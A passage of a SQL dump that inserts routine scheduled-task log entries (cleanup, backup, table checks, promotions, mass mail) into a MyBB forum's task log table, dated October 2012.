('11096', '1', '1350561610', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11097', '4', '1350561655', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11098', '7', '1350561859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11099', '5', '1350561912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11100', '9', '1350562220', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11101', '5', '1350563101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11102', '9', '1350563109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11103', '3', '1350563637', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11104', '9', '1350564026', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11105', '5', '1350564310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11106', '9', '1350565285', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11107', '3', '1350565288', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11108', '1', '1350565313', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11109', '7', '1350565435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11110', '5', '1350565509', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11111', '9', '1350565821', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11112', '5', '1350566705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11113', '9', '1350566729', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11114', '3', '1350567033', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11115', '9', '1350567924', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11116', '5', '1350568162', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11117', '9', '1350568831', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11118', '3', '1350568834', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11119', '1', '1350568856', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11120', '7', '1350568868', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11121', '5', '1350569336', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11122', '9', '1350570178', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11123', '5', '1350570625', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11124', '9', '1350570732', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11125', '3', '1350570746', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11126', '9', '1350571281', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11127', '5', '1350571555', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11128', '9', '1350572106', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11129', '3', '1350572509', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11130', '1', '1350572529', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11131', '7', '1350572531', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11132', '5', '1350572708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11133', '9', '1350573011', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11134', '5', '1350574328', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11135', '9', '1350574333', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11136', '3', '1350574357', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11137', '9', '1350575340', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11138', '5', '1350575343', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11139', '9', '1350575722', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11140', '3', '1350575943', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11141', '1', '1350576039', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11142', '7', '1350576047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11143', '5', '1350576545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11144', '9', '1350576636', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11145', '5', '1350577529', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11146', '9', '1350577536', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11147', '3', '1350577807', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11148', '9', '1350578505', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11149', '5', '1350578791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11150', '9', '1350579306', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11151', '3', '1350580247', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11152', '1', '1350580266', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11153', '7', '1350580281', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11154', '5', '1350580305', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11155', '9', '1350580418', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11156', '5', '1350581103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11157', '9', '1350581184', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11158', '3', '1350582832', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11159', '9', '1350582860', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11160', '5', '1350582907', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11161', '9', '1350583642', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11162', '3', '1350583648', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11163', '1', '1350583653', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11164', '7', '1350583655', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11165', '5', '1350584123', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11166', '9', '1350584133', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11167', '5', '1350584710', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11168', '9', '1350584997', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11169', '3', '1350585003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11170', '9', '1350586618', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11171', '5', '1350586622', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11172', '3', '1350587005', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11173', '1', '1350587011', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11174', '7', '1350587013', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11175', '5', '1350587135', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11176', '9', '1350587512', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11177', '5', '1350588320', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11178', '9', '1350588381', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11179', '3', '1350588644', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11180', '9', '1350589479', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11181', '5', '1350589523', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11182', '9', '1350590129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11183', '3', '1350590342', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11184', '1', '1350590431', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11185', '7', '1350590467', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11186', '5', '1350590760', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11187', '9', '1350591161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11188', '5', '1350591949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11189', '9', '1350591975', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11190', '3', '1350592207', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11191', '9', '1350592890', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11192', '5', '1350593100', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11193', '9', '1350593746', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11194', '3', '1350593942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11195', '1', '1350594010', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11196', '7', '1350594060', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11197', '5', '1350594307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11198', '9', '1350594633', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11199', '5', '1350595503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11200', '9', '1350595532', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11201', '3', '1350595804', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11202', '9', '1350596404', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11203', '5', '1350596781', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11204', '9', '1350597318', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11205', '3', '1350597543', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11206', '1', '1350597613', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11207', '7', '1350597623', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11208', '5', '1350597911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11209', '9', '1350598302', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11210', '5', '1350599110', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11211', '9', '1350599185', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11212', '3', '1350599466', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11213', '9', '1350600142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11214', '5', '1350600308', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11215', '9', '1350600905', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11216', '3', '1350601168', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11217', '1', '1350601227', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11218', '7', '1350601267', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11219', '5', '1350601588', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11220', '9', '1350602083', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11221', '5', '1350602737', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11222', '9', '1350602757', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11223', '3', '1350603004', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11224', '9', '1350603638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11225', '5', '1350603912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11226', '9', '1350604526', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11227', '3', '1350604759', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11228', '1', '1350604944', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11229', '2', '1350605004', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11230', '7', '1350605018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11231', '11', '1350605023', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11232', '5', '1350605144', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11233', '9', '1350605429', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11234', '5', '1350606379', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11235', '9', '1350606438', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11236', '3', '1350606767', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11237', '9', '1350607270', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11238', '5', '1350607752', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11239', '9', '1350608154', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11240', '3', '1350608358', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11241', '1', '1350608413', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11242', '7', '1350608423', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11243', '5', '1350608702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11244', '9', '1350609026', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11245', '5', '1350609949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11246', '9', '1350610042', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11247', '3', '1350610210', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11248', '9', '1350610831', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11249', '5', '1350611128', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11250', '9', '1350611730', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11251', '3', '1350611966', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11252', '1', '1350612073', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11253', '7', '1350612077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11254', '5', '1350612368', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11255', '9', '1350612655', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11256', '5', '1350613508', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11257', '9', '1350613559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11258', '3', '1350613819', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11259', '9', '1350614504', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11260', '5', '1350614708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11261', '9', '1350615544', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11262', '3', '1350615587', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11263', '1', '1350615634', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11264', '7', '1350615641', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11265', '5', '1350615948', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11266', '9', '1350616208', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11267', '5', '1350617103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11268', '9', '1350617116', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11269', '3', '1350617432', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11270', '9', '1350618227', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11271', '5', '1350618330', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11272', '9', '1350618939', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11273', '3', '1350619343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11274', '1', '1350619347', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11275', '7', '1350619383', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11276', '5', '1350619505', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11277', '9', '1350619826', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11278', '5', '1350620738', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11279', '9', '1350620785', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11280', '3', '1350621008', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11281', '9', '1350621676', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11282', '5', '1350621920', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11283', '9', '1350623693', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11284', '3', '1350623934', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11285', '1', '1350624027', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11286', '7', '1350624196', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11287', '5', '1350624212', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11288', '5', '1350624345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11289', '9', '1350624357', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11290', '3', '1350624620', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11291', '9', '1350626025', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11292', '5', '1350626058', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11293', '9', '1350628478', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11294', '3', '1350628577', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11295', '1', '1350628580', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11296', '7', '1350628584', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11297', '5', '1350628927', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11298', '9', '1350629252', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11299', '5', '1350629282', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11300', '9', '1350629784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11301', '3', '1350629988', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` 